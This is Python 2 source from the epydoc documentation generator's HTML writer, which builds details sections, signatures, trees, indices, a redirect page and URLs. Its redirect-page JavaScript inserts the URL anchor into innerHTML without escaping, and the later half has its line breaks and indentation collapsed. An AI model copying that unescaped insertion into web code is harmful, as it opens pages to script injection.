    #{ 3.6. Details Lists
    #////////////////////////////////////////////////////////////

    def write_details_list(self, out, heading, doc, value_type):
        """
        Write the "details" section for all variables of C{value_type}
        in C{doc}: a table header followed by one details entry per
        variable.
        """
        # Get a list of the VarDocs we should describe.
        if self._redundant_details:
            detailed = None
        else:
            detailed = True
        if isinstance(doc, ClassDoc):
            var_docs = doc.select_variables(value_type=value_type,
                                            imported=False, inherited=False,
                                            public=self._public_filter,
                                            detailed=detailed)
        else:
            var_docs = doc.select_variables(value_type=value_type,
                                            imported=False,
                                            public=self._public_filter,
                                            detailed=detailed)
        if not var_docs: return

        # Write a header
        self.write_table_header(out, "details", heading)
        out(self.TABLE_FOOTER)

        for var_doc in var_docs:
            self.write_details_entry(out, var_doc)

        out('<br />\n')

    def write_details_entry(self, out, var_doc):
        """
        Dispatch one details entry to the function / property /
        variable template, assembling the pieces each template needs.
        """
        descr = self.descr(var_doc, indent=2) or ''
        if var_doc.is_public: div_class = ''
        else: div_class = ' class="private"'

        # Functions
        if isinstance(var_doc.value, RoutineDoc):
            rtype = self.return_type(var_doc, indent=10)
            rdescr = self.return_descr(var_doc, indent=10)
            arg_descrs = []
            args = set()
            # Find the description for each arg.  (Leave them in the
            # same order that they're listed in the docstring.)
            for (arg_names, arg_descr) in var_doc.value.arg_descrs:
                args.update(arg_names)
                lhs = ', '.join([self.arg_name_to_html(var_doc.value, n)
                                 for n in arg_names])
                rhs = self.docstring_to_html(arg_descr, var_doc.value, 10)
                arg_descrs.append( (lhs, rhs) )
            # Check for arguments for which we have @type but not @param;
            # and add them to the arg_descrs list.
            for arg in var_doc.value.arg_types:
                if arg not in args:
                    argname = self.arg_name_to_html(var_doc.value, arg)
                    arg_descrs.append( (argname,'') )

            self.write_function_details_entry(out, var_doc, descr,
                                              var_doc.value.callgraph_uid,
                                              rtype, rdescr, arg_descrs,
                                              div_class)

        # Properties
        elif isinstance(var_doc.value, PropertyDoc):
            prop_doc = var_doc.value
            accessors = [ (name,
                           self.property_accessor_to_html(val_doc, prop_doc),
                           self.summary(val_doc))
                          for (name, val_doc) in
                          [('Get', prop_doc.fget),
                           ('Set', prop_doc.fset),
                           ('Delete', prop_doc.fdel)]
                          if val_doc not in (None, UNKNOWN)
                          and val_doc.pyval is not None ]

            self.write_property_details_entry(out, var_doc, descr,
                                              accessors, div_class)

        # Variables
        else:
            self.write_variable_details_entry(out, var_doc, descr,
                                              div_class)

    def labelled_list_item(self, lhs, rhs):
        # If the RHS starts with a paragraph, then move the
        # paragraph-start tag to the beginning of the lhs instead (so
        # there won't be a line break after the '-').
        m = re.match(r'^<p( [^>]+)?>', rhs)
        if m:
            lhs = m.group() + lhs
            rhs = rhs[m.end():]

        if rhs:
            return '<li>%s - %s</li>' % (lhs, rhs)
        else:
            return '<li>%s</li>' % (lhs,)

    def property_accessor_to_html(self, val_doc, context=None):
        """Render one property accessor (fget/fset/fdel) as HTML."""
        if val_doc not in (None, UNKNOWN):
            if isinstance(val_doc, RoutineDoc):
                return self.function_signature(val_doc, is_summary=True,
                                               link_name=True,
                                               context=context)
            elif isinstance(val_doc, GenericValueDoc):
                return self.pprint_value(val_doc)
            else:
                return self.href(val_doc, context=context)
        else:
            return '??'

    def arg_name_to_html(self, func_doc, arg_name):
        """
        A helper function used to format an argument name, for use in
        the argument description list under a routine's details entry.
        This just wraps strong & code tags around the arg name; and if
        the arg name is associated with a type, then adds it
        parenthetically after the name.
        """
        s = '<strong class="pname"><code>%s</code></strong>' % arg_name
        if arg_name in func_doc.arg_types:
            typ = func_doc.arg_types[arg_name]
            typ_html = self.docstring_to_html(typ, func_doc, 10)
            s += " (%s)" % typ_html
        return s

    write_function_details_entry = compile_template(
        '''
        write_function_details_entry(self, out, var_doc, descr, callgraph, \
        rtype, rdescr, arg_descrs, div_class)
        ''',
        # /------------------------- Template -------------------------\
        '''
        >>> func_doc = var_doc.value
        <a name="$var_doc.name$"></a>
        <div$div_class$>
        >>> self.write_table_header(out, "details")
        <tr><td>
          <table width="100%" cellpadding="0" cellspacing="0" border="0">
          <tr valign="top"><td>
          <h3 class="epydoc">$self.function_signature(var_doc)$
        >>> if var_doc.name in self.SPECIAL_METHODS:
            <br /><em class="fname">($self.SPECIAL_METHODS[var_doc.name]$)</em>
        >>> #endif
        >>> if isinstance(func_doc, ClassMethodDoc):
            <br /><em class="fname">Class Method</em>
        >>> #endif
        >>> if isinstance(func_doc, StaticMethodDoc):
            <br /><em class="fname">Static Method</em>
        >>> #endif
          </h3>
          </td><td align="right" valign="top"
            >$self.pysrc_link(func_doc)$&nbsp;
            $self.callgraph_link(callgraph)$</td>
          </tr></table>
          $self.render_callgraph(callgraph)$
          $descr$
          <dl class="fields">
        >>> # === parameters ===
        >>> if arg_descrs:
            <dt>Parameters:</dt>
            <dd><ul class="nomargin-top">
        >>> for lhs, rhs in arg_descrs:
              $self.labelled_list_item(lhs, rhs)$
        >>> #endfor
            </ul></dd>
        >>> #endif
        >>> # === return type ===
        >>> if rdescr and rtype:
            <dt>Returns: $rtype$</dt>
            <dd>$rdescr$</dd>
        >>> elif rdescr:
            <dt>Returns:</dt>
            <dd>$rdescr$</dd>
        >>> elif rtype:
            <dt>Returns: $rtype$</dt>
        >>> #endif
        >>> # === decorators ===
        >>> if func_doc.decorators not in (None, UNKNOWN):
        >>>   # (staticmethod & classmethod are already shown, above)
        >>>   decos = filter(lambda deco:
        >>>     not ((deco=="staticmethod" and
        >>>           isinstance(func_doc, StaticMethodDoc)) or
        >>>          (deco=="classmethod" and
        >>>           isinstance(func_doc, ClassMethodDoc))),
        >>>     func_doc.decorators)
        >>> else:
        >>>   decos = None
        >>> #endif
        >>> if decos:
            <dt>Decorators:</dt>
            <dd><ul class="nomargin-top">
        >>> for deco in decos:
              <li><code>@$deco$</code></li>
        >>> #endfor
            </ul></dd>
        >>> #endif
        >>> # === exceptions ===
        >>> if func_doc.exception_descrs not in (None, UNKNOWN, (), []):
            <dt>Raises:</dt>
            <dd><ul class="nomargin-top">
        >>> for name, descr in func_doc.exception_descrs:
        >>>   exc_name = self.docindex.find(name, func_doc)
        >>>   if exc_name is not None:
        >>>     name = self.href(exc_name, label=str(name))
        >>>   #endif
              $self.labelled_list_item(
                  "<code><strong class=\'fraise\'>" +
                  str(name) + "</strong></code>",
                  self.docstring_to_html(descr, func_doc, 8))$
        >>> #endfor
            </ul></dd>
        >>> #endif
        >>> # === overrides ===
        >>> if var_doc.overrides not in (None, UNKNOWN):
            <dt>Overrides:
        >>> # Avoid passing GenericValueDoc to href()
        >>> if isinstance(var_doc.overrides.value, RoutineDoc):
              $self.href(var_doc.overrides.value, context=var_doc)$
        >>> else:
        >>> # In this case, a less interesting label is generated.
              $self.href(var_doc.overrides, context=var_doc)$
        >>> #endif
        >>> if (func_doc.docstring in (None, UNKNOWN) and
        >>>     var_doc.overrides.value.docstring not in (None, UNKNOWN)):
              <dd><em class="note">(inherited documentation)</em></dd>
        >>> #endif
            </dt>
        >>> #endif
          </dl>
        >>> # === metadata ===
        >>> self.write_standard_fields(out, func_doc)
        </td></tr></table>
        </div>
        ''')
        # \------------------------------------------------------------/

    # Names for the __special__ methods.
    # Maps dunder-method name -> human-readable label shown in the
    # function details entry (see write_function_details_entry).
    SPECIAL_METHODS = {
        '__init__': 'Constructor',
        '__del__': 'Destructor',
        '__add__': 'Addition operator',
        '__sub__': 'Subtraction operator',
        '__and__': 'And operator',
        '__or__': 'Or operator',
        '__xor__': 'Exclusive-Or operator',
        '__repr__': 'Representation operator',
        '__call__': 'Call operator',
        '__getattr__': 'Qualification operator',
        '__getitem__': 'Indexing operator',
        '__setitem__': 'Index assignment operator',
        '__delitem__': 'Index deletion operator',
        '__delslice__': 'Slice deletion operator',
        '__setslice__': 'Slice assignment operator',
        '__getslice__': 'Slicling operator',
        '__len__': 'Length operator',
        '__cmp__': 'Comparison operator',
        '__eq__': 'Equality operator',
        '__in__': 'Containership operator',
        '__gt__': 'Greater-than operator',
        '__lt__': 'Less-than operator',
        '__ge__': 'Greater-than-or-equals operator',
        '__le__': 'Less-than-or-equals operator',
        '__radd__': 'Right-side addition operator',
        '__hash__': 'Hashing function',
        '__contains__': 'In operator',
        '__nonzero__': 'Boolean test operator',
        '__str__': 'Informal representation operator',
        }

    write_property_details_entry = compile_template(
        '''
        write_property_details_entry(self, out, var_doc, descr, \
        accessors, div_class)
        ''',
        # /------------------------- Template -------------------------\
        '''
        >>> prop_doc = var_doc.value
        <a name="$var_doc.name$"></a>
        <div$div_class$>
        >>> self.write_table_header(out, "details")
        <tr><td>
          <h3 class="epydoc">$var_doc.name$</h3>
          $descr$
          <dl class="fields">
        >>> for (name, val, summary) in accessors:
            <dt>$name$ Method:</dt>
            <dd class="value">$val$
        >>> if summary:
              - $summary$
        >>> #endif
            </dd>
        >>> #endfor
        >>> if prop_doc.type_descr not in (None, UNKNOWN):
            <dt>Type:</dt>
            <dd>$self.type_descr(var_doc, indent=6)$</dd>
        >>> #endif
          </dl>
        >>> self.write_standard_fields(out, prop_doc)
        </td></tr></table>
        </div>
        ''')
        # \------------------------------------------------------------/

    write_variable_details_entry = compile_template(
        '''
        write_variable_details_entry(self, out, var_doc, descr,
        div_class)
        ''',
        # /------------------------- Template -------------------------\
        '''
        <a name="$var_doc.name$"></a>
        <div$div_class$>
        >>> self.write_table_header(out, "details")
        <tr><td>
          <h3 class="epydoc">$var_doc.name$</h3>
          $descr$
          <dl class="fields">
        >>> if var_doc.type_descr not in (None, UNKNOWN):
            <dt>Type:</dt>
            <dd>$self.type_descr(var_doc, indent=6)$</dd>
        >>> #endif
          </dl>
        >>> self.write_standard_fields(out, var_doc)
        >>> if var_doc.value is not UNKNOWN:
          <dl class="fields">
            <dt>Value:</dt>
            <dd>$self.pprint_value(var_doc.value)$</dd>
          </dl>
        >>> #endif
        </td></tr></table>
        </div>
        ''')
        # \------------------------------------------------------------/

    def variable_tooltip(self, var_doc):
        """
        Return a C{title="..."} attribute string holding a truncated
        plaintext repr of the variable's value, or '' if no value.
        """
        if var_doc.value in (None, UNKNOWN):
            return ''
        s = var_doc.value.pyval_repr().to_plaintext(None)
        if len(s) > self._variable_tooltip_linelen:
            s = s[:self._variable_tooltip_linelen-3]+'...'
        return ' title="%s"' % plaintext_to_html(s)

    def pprint_value(self, val_doc):
        """Render a variable's value: a <pre> block for generic values,
        a link otherwise."""
        if val_doc is UNKNOWN:
            return '??'
        elif isinstance(val_doc, GenericValueDoc):
            return ('<table><tr><td><pre class="variable">\n' +
                    val_doc.pyval_repr().to_html(None) +
                    '\n</pre></td></tr></table>\n')
        else:
            return self.href(val_doc)

    #////////////////////////////////////////////////////////////
    #{ Base Tree
    #////////////////////////////////////////////////////////////

    def base_tree(self, doc, width=None, postfix='', context=None):
        """
        @return: The HTML code for a class's base tree.  The tree is
            drawn 'upside-down' and right justified, to allow for
            multiple inheritance.
        @rtype: C{string}
        """
        if context is None:
            context = doc.defining_module
        # NOTE(review): `width == None` should idiomatically be
        # `width is None`; behavior is the same for None.
        if width == None: width = self.find_tree_width(doc, context)
        if isinstance(doc, ClassDoc) and doc.bases != UNKNOWN:
            bases = doc.bases
        else:
            bases = []

        if postfix == '':
            # [XX] use var name instead of canonical name?
            s = (' '*(width-2) + '<strong class="uidshort">'+
                 self.contextual_label(doc, context)+'</strong>\n')
        else:
            s = ''
        # Walk the bases right-to-left, recursing (with a narrower
        # width) so each ancestor column lines up above its child.
        for i in range(len(bases)-1, -1, -1):
            base = bases[i]
            label = self.contextual_label(base, context)
            s = (' '*(width-4-len(label)) + self.href(base, label)
                 +' --+'+postfix+'\n' +
                 ' '*(width-4) + ' |'+postfix+'\n' + s)
            if i != 0:
                s = (self.base_tree(base, width-4, ' |'+postfix, context)+s)
            else:
                s = (self.base_tree(base, width-4, ' '+postfix, context)+s)
        return s

    def find_tree_width(self, doc, context):
        """
        Helper function for L{base_tree}.

        @return: The width of a base tree, when drawn
            right-justified.  This is used by L{base_tree} to
            determine how far to indent lines of the base tree.
        @rtype: C{int}
        """
        if not isinstance(doc, ClassDoc): return 2
        if doc.bases == UNKNOWN: return 2
        width = 2
        for base in doc.bases:
            width = max(width, len(self.contextual_label(base, context))+4,
                        self.find_tree_width(base, context)+4)
        return width

    def contextual_label(self, doc, context):
        """
        Return the label for C{doc} to be shown in C{context}.
        """
        if doc.canonical_name is None:
            if doc.parse_repr is not None:
                return doc.parse_repr
            else:
                return '??'
        else:
            if context is UNKNOWN:
                return str(doc.canonical_name)
            else:
                context_name = context.canonical_name
                return str(doc.canonical_name.contextualize(context_name))

    #////////////////////////////////////////////////////////////
    #{ Function Signatures
    #////////////////////////////////////////////////////////////

    def function_signature(self, api_doc, is_summary=False,
                           link_name=False, anchor=False, context=None):
        """Render a function signature in HTML.

        @param api_doc: The object whose name is to be rendered.  If a
            C{VariableDoc}, its C{value} should be a C{RoutineDoc}
        @type api_doc: L{VariableDoc} or L{RoutineDoc}
        @param is_summary: True if the fuction is to be rendered in the
            summary.
        type css_class: C{bool}
        @param link_name: If True, the name is a link to the object
            anchor.
        @type link_name: C{bool}
        @param anchor: If True, the name is the object anchor.
        @type anchor: C{bool}
        @param context: If set, represent the function name from this
            context.  Only useful when C{api_doc} is a L{RoutineDoc}.
        @type context: L{DottedName}

        @return: The HTML code for the object.
        @rtype: C{str}
        """
        if is_summary: css_class = 'summary-sig'
        else: css_class = 'sig'

        # [XX] clean this up!
        if isinstance(api_doc, VariableDoc):
            func_doc = api_doc.value
            # This should never happen, but just in case:
            if api_doc.value in (None, UNKNOWN):
                return (('<span class="%s"><span class="%s-name">%s'+
                         '</span>(...)</span>') %
                        (css_class, css_class, api_doc.name))
            # Get the function's name.
            name = self.summary_name(api_doc, css_class=css_class+'-name',
                                     link_name=link_name, anchor=anchor)
        else:
            func_doc = api_doc
            name = self.href(api_doc, css_class=css_class+'-name',
                             context=context)

        if func_doc.posargs == UNKNOWN:
            args = ['...']
        else:
            args = [self.func_arg(n, d, css_class) for (n, d)
                    in zip(func_doc.posargs, func_doc.posarg_defaults)]
        if func_doc.vararg not in (None, UNKNOWN):
            if func_doc.vararg == '...':
                args.append('<span class="%s-arg">...</span>' % css_class)
            else:
                args.append('<span class="%s-arg">*%s</span>' %
                            (css_class, func_doc.vararg))
        if func_doc.kwarg not in (None, UNKNOWN):
            args.append('<span class="%s-arg">**%s</span>' %
                        (css_class, func_doc.kwarg))

        return ('<span class="%s">%s(%s)</span>' %
                (css_class, name, ',\n        '.join(args)))

    def summary_name(self, api_doc, css_class='summary-name',
                     link_name=False, anchor=False):
        """Render an object name in HTML.

        @param api_doc: The object whose name is to be rendered
        @type api_doc: L{APIDoc}
        @param css_class: The CSS class to assign to the rendered name
        type css_class: C{str}
        @param link_name: If True, the name is a link to the object
            anchor.
        @type link_name: C{bool}
        @param anchor: If True, the name is the object anchor.
        @type anchor: C{bool}

        @return: The HTML code for the object.
        @rtype: C{str}
        """
        if anchor:
            rv = '<a name="%s"></a>' % api_doc.name
        else:
            rv = ''

        if link_name:
            rv += self.href(api_doc, css_class=css_class)
        else:
            rv += '<span class="%s">%s</span>' % (css_class, api_doc.name)

        return rv

    # [xx] tuple args???
    def func_arg(self, name, default, css_class):
        name = self._arg_name(name)
        s = '<span class="%s-arg">%s</span>' % (css_class, name)
        if default is not None:
            s += ('=<span class="%s-default">%s</span>' %
                  (css_class, default.summary_pyval_repr().to_html(None)))
        return s

    def _arg_name(self, arg):
        # `arg` is either a plain name or a (possibly nested) tuple of
        # names (Python 2 tuple-unpacking parameters).
        if isinstance(arg, basestring):
            return arg
        elif len(arg) == 1:
            return '(%s,)' % self._arg_name(arg[0])
        else:
            return '(%s)' % (', '.join([self._arg_name(a) for a in arg]))

    #////////////////////////////////////////////////////////////
    #{ Import Lists
    #////////////////////////////////////////////////////////////

    def write_imports(self, out, doc):
        """Write the "Imports:" paragraph for a namespace page."""
        assert isinstance(doc, NamespaceDoc)
        imports = doc.select_variables(imported=True,
                                       public=self._public_filter)
        if not imports: return

        out('<p class="indent-wrapped-lines">')
        out('<b>Imports:</b>\n  ')
        out(',\n  '.join([self._import(v, doc) for v in imports]))
        out('\n</p><br />\n')

    def _import(self, var_doc, context):
        """Render one imported variable as a link (when resolvable) or
        plain text."""
        if var_doc.imported_from not in (None, UNKNOWN):
            return self.href(var_doc.imported_from,
                             var_doc.name, context=context,
                             tooltip='%s' % var_doc.imported_from)
        elif (var_doc.value not in (None, UNKNOWN) and
              not isinstance(var_doc.value, GenericValueDoc)):
            return self.href(var_doc.value,
                             var_doc.name, context=context,
                             tooltip='%s' % var_doc.value.canonical_name)
        else:
            return plaintext_to_html(var_doc.name)

    #////////////////////////////////////////////////////////////
    #{ Function Attributes
    #////////////////////////////////////////////////////////////

    #////////////////////////////////////////////////////////////
    #{ Module Trees
    #////////////////////////////////////////////////////////////

    def write_module_list(self, out, doc):
        # (Continues past this chunk.)
        if len(doc.submodules) == 0: return
        self.write_table_header(out,
"summary", "Submodules") for group_name in doc.group_names(): if not doc.submodule_groups[group_name]: continue if group_name: self.write_group_header(out, group_name) out(' <tr><td class="summary">\n' ' <ul class="nomargin">\n') for submodule in doc.submodule_groups[group_name]: self.write_module_tree_item(out, submodule, package=doc) out(' </ul></td></tr>\n') out(self.TABLE_FOOTER+'\n<br />\n') def write_module_tree_item(self, out, doc, package=None): # If it's a private variable, then mark its <li>. var = package and package.variables.get(doc.canonical_name[-1]) priv = ((var is not None and var.is_public is False) or (var is None and doc.canonical_name[-1].startswith('_'))) out(' <li%s> <strong class="uidlink">%s</strong>' % (priv and ' class="private"' or '', self.href(doc))) if doc.summary not in (None, UNKNOWN): out(': <em class="summary">'+ self.description(doc.summary, doc, 8)+'</em>') if doc.submodules != UNKNOWN and doc.submodules: if priv: out('\n <ul class="private">\n') else: out('\n <ul>\n') for submodule in doc.submodules: self.write_module_tree_item(out, submodule, package=doc) out(' </ul>\n') out(' </li>\n') #//////////////////////////////////////////////////////////// #{ Class trees #//////////////////////////////////////////////////////////// write_class_tree_item = compile_template( ''' write_class_tree_item(self, out, doc, class_set) ''', # /------------------------- Template -------------------------\ ''' >>> if doc.summary in (None, UNKNOWN): <li> <strong class="uidlink">$self.href(doc)$</strong> >>> else: <li> <strong class="uidlink">$self.href(doc)$</strong>: <em class="summary">$self.description(doc.summary, doc, 8)$</em> >>> # endif >>> if doc.subclasses: <ul> >>> for subclass in sorted(set(doc.subclasses), key=lambda c:c.canonical_name[-1]): >>> if subclass in class_set: >>> self.write_class_tree_item(out, subclass, class_set) >>> #endif >>> #endfor </ul> >>> #endif </li> ''') # 
\------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ Standard Fields #//////////////////////////////////////////////////////////// def write_standard_fields(self, out, doc): """ Write HTML code containing descriptions of any standard markup fields that are defined by the given L{APIDoc} object (such as C{@author} and C{@todo} fields). @param doc: The L{APIDoc} object containing the API documentation for the object whose standard markup fields should be described. """ fields = [] field_values = {} for (field, arg, descr) in doc.metadata: if field not in field_values: fields.append(field) if field.takes_arg: subfields = field_values.setdefault(field,{}) subfields.setdefault(arg,[]).append(descr) else: field_values.setdefault(field,[]).append(descr) if not fields: return out('<div class="fields">') for field in fields: if field.takes_arg: for arg, descrs in field_values[field].items(): self.write_standard_field(out, doc, field, descrs, arg) else: self.write_standard_field(out, doc, field, field_values[field]) out('</div>') write_standard_field = compile_template( """ write_standard_field(self, out, doc, field, descrs, arg='') """, # /------------------------- Template -------------------------\ ''' >>> if arg: arglabel = " (%s)" % arg >>> else: arglabel = "" >>> if len(descrs) == 1: <p><strong>$field.singular+arglabel$:</strong> $self.description(descrs[0], doc, 8)$ </p> >>> elif field.short: <dl><dt>$field.plural+arglabel$:</dt> <dd> >>> for descr in descrs[:-1]: $self.description(descr, doc, 10)$, >>> # end for $self.description(descrs[-1], doc, 10)$ </dd> </dl> >>> else: <strong>$field.plural+arglabel$:</strong> <ul class="nomargin-top"> >>> for descr in descrs: <li> $self.description(descr, doc, 8)$ </li> >>> # end for </ul> >>> # end else >>> # end for ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ 
Index generation #//////////////////////////////////////////////////////////// #: A list of metadata indices that should be generated. Each #: entry in this list is a tuple C{(tag, label, short_label)}, #: where C{tag} is the cannonical tag of a metadata field; #: C{label} is a label for the index page; and C{short_label} #: is a shorter label, used in the index selector. METADATA_INDICES = [('bug', 'Bug List', 'Bugs'), ('todo', 'To Do List', 'To Do'), ('change', 'Change Log', 'Changes'), ('deprecated', 'Deprecation List', 'Deprecations'), ('since', 'Introductions List', 'Introductions'), ] def build_identifier_index(self): items = [] for doc in self.indexed_docs: name = plaintext_to_html(doc.canonical_name[-1]) if isinstance(doc, RoutineDoc): name += '()' url = self.url(doc) if not url: continue container = self.docindex.container(doc) items.append( (name, url, container) ) return sorted(items, key=lambda v:v[0].lower()) def _group_by_letter(self, items): """Preserves sort order of the input.""" index = {} for item in items: first_letter = item[0][0].upper() if not ("A" <= first_letter <= "Z"): first_letter = '_' index.setdefault(first_letter, []).append(item) return index def build_term_index(self): items = [] for doc in self.indexed_docs: url = self.url(doc) items += self._terms_from_docstring(url, doc, doc.descr) for (field, arg, descr) in doc.metadata: items += self._terms_from_docstring(url, doc, descr) if hasattr(doc, 'type_descr'): items += self._terms_from_docstring(url, doc, doc.type_descr) if hasattr(doc, 'return_descr'): items += self._terms_from_docstring(url, doc, doc.return_descr) if hasattr(doc, 'return_type'): items += self._terms_from_docstring(url, doc, doc.return_type) return sorted(items, key=lambda v:v[0].lower()) def _terms_from_docstring(self, base_url, container, parsed_docstring): if parsed_docstring in (None, UNKNOWN): return [] terms = [] # Strip any existing anchor off: base_url = re.sub('#.*', '', '%s' % (base_url,)) for term in 
parsed_docstring.index_terms(): anchor = self._term_index_to_anchor(term) url = '%s#%s' % (base_url, anchor) terms.append( (term.to_plaintext(None), url, container) ) return terms def build_metadata_index(self, field_name): # Build the index. index = {} for doc in self.indexed_docs: if (not self._show_private and self._doc_or_ancestor_is_private(doc)): continue descrs = {} if doc.metadata is not UNKNOWN: for (field, arg, descr) in doc.metadata: if field.tags[0] == field_name: descrs.setdefault(arg, []).append(descr) for (arg, descr_list) in descrs.iteritems(): index.setdefault(arg, []).append( (doc, descr_list) ) return index def _term_index_to_anchor(self, term): """ Given the name of an inline index item, construct a URI anchor. These anchors are used to create links from the index page to each index item. """ # Include "-" so we don't accidentally collide with the name # of a python identifier. s = re.sub(r'\s\s+', '-', term.to_plaintext(None)) return "index-"+re.sub("[^a-zA-Z0-9]", "_", s) #//////////////////////////////////////////////////////////// #{ Redirect page #//////////////////////////////////////////////////////////// def write_redirect_page(self, out): """ Build the auto-redirect page, which translates dotted names to URLs using javascript. When the user visits <redirect.html#dotted.name>, they will automatically get redirected to the page for the object with the given fully-qualified dotted name. E.g., for epydoc, <redirect.html#epydoc.apidoc.UNKNOWN> redirects the user to <epydoc.apidoc-module.html#UNKNOWN>. """ # Construct a list of all the module & class pages that we're # documenting. The redirect_url javascript will scan through # this list, looking for a page name that matches the # requested dotted name. pages = (['%s-m' % val_doc.canonical_name for val_doc in self.module_list] + ['%s-c' % val_doc.canonical_name for val_doc in self.class_list]) # Sort the pages from longest to shortest. This ensures that # we find e.g. 
"x.y.z" in the list before "x.y". pages = sorted(pages, key=lambda p:-len(p)) # Write the redirect page. self._write_redirect_page(out, pages) _write_redirect_page = compile_template( ''' _write_redirect_page(self, out, pages) ''', # /------------------------- Template -------------------------\ ''' <html><head><title>Epydoc Redirect Page</title> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="pragma" content="no-cache" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body> <script type="text/javascript"> <!-- var pages = $"[%s]" % ", ".join(['"%s"' % v for v in pages])$; var dottedName = get_anchor(); if (dottedName) { var target = redirect_url(dottedName); if (target) window.location.replace(target); } // --> </script> <h3>Epydoc Auto-redirect page</h3> <p>When javascript is enabled, this page will redirect URLs of the form <tt>redirect.html#<i>dotted.name</i></tt> to the documentation for the object with the given fully-qualified dotted name.</p> <p><a id="message"> &nbsp; </a></p> <script type="text/javascript"> <!-- if (dottedName) { var msg = document.getElementById("message"); msg.innerHTML = "No documentation found for <tt>"+ dottedName+"</tt>"; } // --> </script> </body> </html> ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ URLs list #//////////////////////////////////////////////////////////// def write_api_list(self, out): """ Write a list of mapping name->url for all the documented objects. """ # Construct a list of all the module & class pages that we're # documenting. The redirect_url javascript will scan through # this list, looking for a page name that matches the # requested dotted name. 
skip = (ModuleDoc, ClassDoc, type(UNKNOWN)) for val_doc in self.module_list: self.write_url_record(out, val_doc) for var in val_doc.variables.itervalues(): if not isinstance(var.value, skip): self.write_url_record(out, var) for val_doc in self.class_list: self.write_url_record(out, val_doc) for var in val_doc.variables.itervalues(): self.write_url_record(out, var) def write_url_record(self, out, obj): url = self.url(obj) if url is not None: out("%s\t%s\n" % (obj.canonical_name, url)) #//////////////////////////////////////////////////////////// #{ Helper functions #//////////////////////////////////////////////////////////// def _val_is_public(self, valdoc): """Make a best-guess as to whether the given class is public.""" container = self.docindex.container(valdoc) if isinstance(container, NamespaceDoc): for vardoc in container.variables.values(): if vardoc in (UNKNOWN, None): continue if vardoc.value is valdoc: return vardoc.is_public return True # [XX] Is it worth-while to pull the anchor tricks that I do here? # Or should I just live with the fact that show/hide private moves # stuff around? 
write_table_header = compile_template( ''' write_table_header(self, out, css_class, heading=None, \ private_link=True, colspan=2) ''', # /------------------------- Template -------------------------\ ''' >>> if heading is not None: >>> anchor = "section-%s" % re.sub("\W", "", heading) <!-- ==================== $heading.upper()$ ==================== --> <a name="$anchor$"></a> >>> #endif <table class="$css_class$" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> >>> if heading is not None: <tr bgcolor="#70b0f0" class="table-header"> >>> if private_link and self._show_private: <td colspan="$colspan$" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">$heading$</span></td> <td align="right" valign="top" ><span class="options">[<a href="#$anchor$" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> >>> else: <td align="left" colspan="2" class="table-header"> <span class="table-header">$heading$</span></td> >>> #endif </tr> >>> #endif ''') # \------------------------------------------------------------/ TABLE_FOOTER = '</table>\n' PRIVATE_LINK = ''' <span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span> '''.strip() write_group_header = compile_template( ''' write_group_header(self, out, group, tr_class='') ''', # /------------------------- Template -------------------------\ ''' <tr bgcolor="#e8f0f8" $tr_class$> <th colspan="2" class="group-header" >&nbsp;&nbsp;&nbsp;&nbsp;$group$</th></tr> ''') # \------------------------------------------------------------/ _url_cache = {} def url(self, obj): """ Return the URL for the given object, which can be a C{VariableDoc}, a C{ValueDoc}, or a C{DottedName}. 
""" cached_url = self._url_cache.get(id(obj)) if cached_url is not None: return cached_url else: url = self._url_cache[id(obj)] = self._url(obj) return url def _url(self, obj): """ Internal helper for L{url}. """ # Module: <canonical_name>-module.html if isinstance(obj, ModuleDoc): if obj not in self.module_set: return None return urllib.quote('%s'%obj.canonical_name) + '-module.html' # Class: <canonical_name>-class.html elif isinstance(obj, ClassDoc): if obj not in self.class_set: return None return urllib.quote('%s'%obj.canonical_name) + '-class.html' # Variable elif isinstance(obj, VariableDoc): val_doc = obj.value if isinstance(val_doc, (ModuleDoc, ClassDoc)): return self.url(val_doc) elif obj.container in (None, UNKNOWN): if val_doc in (None, UNKNOWN): return None return self.url(val_doc) elif obj.is_imported == True: if obj.imported_from is not UNKNOWN: return self.url(obj.imported_from) else: return None else: container_url = self.url(obj.container) if container_url is None: return None return '%s#%s' % (container_url, urllib.quote('%s'%obj.name)) # Value (other than module or class) elif isinstance(obj, ValueDoc): container = self.docindex.container(obj) if container is None: return None # We couldn't find it! 
else: container_url = self.url(container) if container_url is None: return None anchor = urllib.quote('%s'%obj.canonical_name[-1]) return '%s#%s' % (container_url, anchor) # Dotted name: look up the corresponding APIDoc elif isinstance(obj, DottedName): val_doc = self.docindex.get_valdoc(obj) if val_doc is None: return None return self.url(val_doc) # Special pages: elif obj == 'indices': return 'identifier-index.html' elif obj == 'help': return 'help.html' elif obj == 'trees': return self._trees_url else: raise ValueError, "Don't know what to do with %r" % obj def pysrc_link(self, api_doc): if not self._incl_sourcecode: return '' url = self.pysrc_url(api_doc) if url is not None: return ('<span class="codelink"><a href="%s">source&nbsp;' 'code</a></span>' % url) else: return '' def pysrc_url(self, api_doc): if isinstance(api_doc, VariableDoc): if api_doc.value not in (None, UNKNOWN): return pysrc_url(api_doc.value) else: return None elif isinstance(api_doc, ModuleDoc): if api_doc in self.modules_with_sourcecode: return ('%s-pysrc.html' % urllib.quote('%s' % api_doc.canonical_name)) else: return None else: module = api_doc.defining_module if module == UNKNOWN: return None module_pysrc_url = self.pysrc_url(module) if module_pysrc_url is None: return None module_name = module.canonical_name if not module_name.dominates(api_doc.canonical_name, True): log.debug('%r is in %r but name does not dominate' % (api_doc, module)) return module_pysrc_url mname_len = len(module.canonical_name) anchor = '%s' % api_doc.canonical_name[mname_len:] return '%s#%s' % (module_pysrc_url, urllib.quote(anchor)) # We didn't find it: return None # [xx] add code to automatically do <code> wrapping or the like? def href(self, target, label=None, css_class=None, context=None, tooltip=None): """ Return the HTML code for an HREF link to the given target (which can be a C{VariableDoc}, a C{ValueDoc}, or a C{DottedName}. 
